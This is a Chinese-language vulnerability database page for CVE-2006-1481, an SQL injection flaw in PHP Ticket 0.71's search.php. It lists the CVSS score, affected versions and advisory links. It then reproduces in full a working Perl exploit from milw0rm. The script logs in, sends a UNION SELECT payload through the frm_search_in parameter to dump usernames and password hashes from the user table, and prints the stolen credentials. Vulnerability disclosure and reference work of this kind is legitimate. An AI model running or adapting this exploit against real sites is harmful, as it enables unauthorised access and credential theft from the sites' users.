CVE-2006-1481
CVSS6.5
发布时间 :2006-03-28 20:06:00
修订时间 :2011-03-07 21:33:10
NMCOE    

[原文]SQL injection vulnerability in search.php in PHP Ticket 0.71 allows remote authenticated users to execute arbitrary SQL commands and obtain usernames and passwords via the frm_search_in parameter.


[CNNVD]PHP Ticket 'Search.PHP' SQL注入漏洞(CNNVD-200603-465)

        在PHP Ticket 0.71的search.php中存在SQL注入漏洞,远程经过身份验证的用户可通过frm_search_in参数执行任意SQL命令和获得用户名和口令。

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:php_ticket:php_ticket:0.71
cpe:/a:php_ticket:php_ticket:0.5
cpe:/a:php_ticket:php_ticket:0.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1481
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1481
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-465
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1106
(UNKNOWN)  VUPEN  ADV-2006-1106
http://www.securityfocus.com/bid/17229
(UNKNOWN)  BID  17229
http://secunia.com/advisories/19412
(UNKNOWN)  SECUNIA  19412
http://milw0rm.com/exploits/1609
(UNKNOWN)  MILW0RM  1609
http://xforce.iss.net/xforce/xfdb/25436
(UNKNOWN)  XF  phpticket-search-sql-injection(25436)

- 漏洞信息

PHP Ticket 'Search.PHP' SQL注入漏洞
中危 SQL注入
2006-03-28 00:00:00 2006-03-30 00:00:00
远程  
        在PHP Ticket 0.71的search.php中存在SQL注入漏洞,远程经过身份验证的用户可通过frm_search_in参数执行任意SQL命令和获得用户名和口令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1609)

PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit (EDBID:1609)
php webapps
2006-03-25 Verified
0 undefined1_
N/A [点击下载]
#!/usr/bin/perl

###############################################################################
#Copyright (C) undefined1_
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
###############################################################################

use strict; 
use IO::Socket;

$| = 1;
printf ":: php ticket <= 0.71 exploit (privilege escalation) - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";


my $website = shift || usage();
my $user = shift || usage();
my $password = shift || usage();

my $path = "/";
my $site = $website;
if(index($website, "/") != -1)
{
	my $index = index($website, "/");
	$path = substr($website, $index);
	$site = substr($website, 0, $index);
	if(substr($path, length($path)-1) ne "/")
	{
		$path .= "/";
	}
}


my $eop = "\r\nHost: $site\r\n";
$eop .= "User-Agent: Mozilla/5.0\r\n";
$eop .= "Connection: close\r\n";



my $packet1 = "POST ".$path."search.php HTTP/1.1\r\n";
my $postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
$postdata .= "Host: $site\r\n";
$postdata .= "User-Agent: Mozilla/5.0\r\n";
$postdata .= "Connection: close\r\n";
$postdata .= "Content-Length: 31\r\n";
$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
$postdata .= "frm_user=".$user."&frm_passwd=".$password;
my $data = sendpacket($site, $packet1.$postdata);



my $packet2 = "POST ".$path."search.php HTTP/1.1\r\n";
$postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
$postdata .= "Host: $site\r\n";
$postdata .= "User-Agent: Mozilla/5.0\r\n";
$postdata .= "Connection: close\r\n";
$postdata .= "Content-Length: 215\r\n";
$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
$postdata .= "frm_query=a&frm_search_in=1%3D0+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2CCONCAT%280x30576e656420%2Cuser%2C0x20%2Cpasswd%29%2C1%2C1%2C1%2C1%2C1%2C1+from+user--&frm_ordertype=date&frm_order_desc=DESC&frm_querytype=%25";
$data = sendpacket($site, $packet2.$postdata);


print "password are encrypted with the PASSWORD() function of mysql\n\n";

printf("username%-20spassword\n", " ");
printf("--------%-20s--------\n", " ");
my $index = 0;
while(($index = index($data,"0Wned ", $index)) != -1)
{
	$index += 6;
	my $index2 = index($data," ", $index);
	my $index3 = index($data,"</A>", $index2);
	printf("%s%-20s%s\n", substr($data,$index,$index2-$index) , " ", substr($data,$index2+1,$index3-($index2+1)));
	$index = $index3+4;
}


sub sendpacket(\$,\$) {
	my $server = shift;
	my $request = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => "80") or die "[-] Could not connect to $server:80 $!\n";
	print $sock "$request";

	
	my $data = "";
	my $answer;
	while($answer = <$sock>)
	{
		$data .= $answer;
	}
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s <website> <user> <password>\n", $0;
	printf "exemple: %s www.site.com/phpticket/\n", $0;
	exit;
}

# milw0rm.com [2006-03-25]
		

- 漏洞信息

24163
PHP Ticket search.php frm_search_in Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-03-25 Unknow
2006-03-25 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站